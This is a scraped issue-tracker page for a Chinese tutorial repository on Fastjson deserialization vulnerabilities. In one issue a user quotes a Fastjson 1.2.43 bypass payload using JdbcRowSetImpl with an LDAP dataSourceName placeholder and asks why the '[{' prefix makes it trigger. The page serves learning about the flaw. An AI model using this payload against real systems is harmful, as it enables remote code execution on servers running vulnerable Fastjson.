LearnFastjsonVulnFromZero-Basic icon indicating copy to clipboard operation
LearnFastjsonVulnFromZero-Basic copied to clipboard

verified publisher icon W01fh4cker

Metadata

【两万字原创】零基础学fastjson漏洞(基础篇),公众号:追梦信安

Results 2 LearnFastjsonVulnFromZero-Basic issues
Sort by recently updated
recently updated
newest added

支持

1 comment

Connor5610 avatar Connor5610

请问关于fastjson1.2.43版本下的绕过payload有没有深度解析?

1 comment

在1.2.43版本下,使用了如下的payload绕过: { "@type":"[com.sun.rowset.JdbcRowSetImpl"[{ "dataSourceName":"ldap://xxx", "autoCommit":true } 只有添加"[{"才不会报错并且触发漏洞,请问是否了解具体原因,我看好多篇解析都没说到这个问题,不知道是不是我的查找方向错了

Bertram-demo avatar Bertram-demo

Metadata

86
Stars
9
Forks
Watchers

Owner

verified publisher icon W01fh4cker

Metadata

【两万字原创】零基础学fastjson漏洞(基础篇),公众号:追梦信安

Back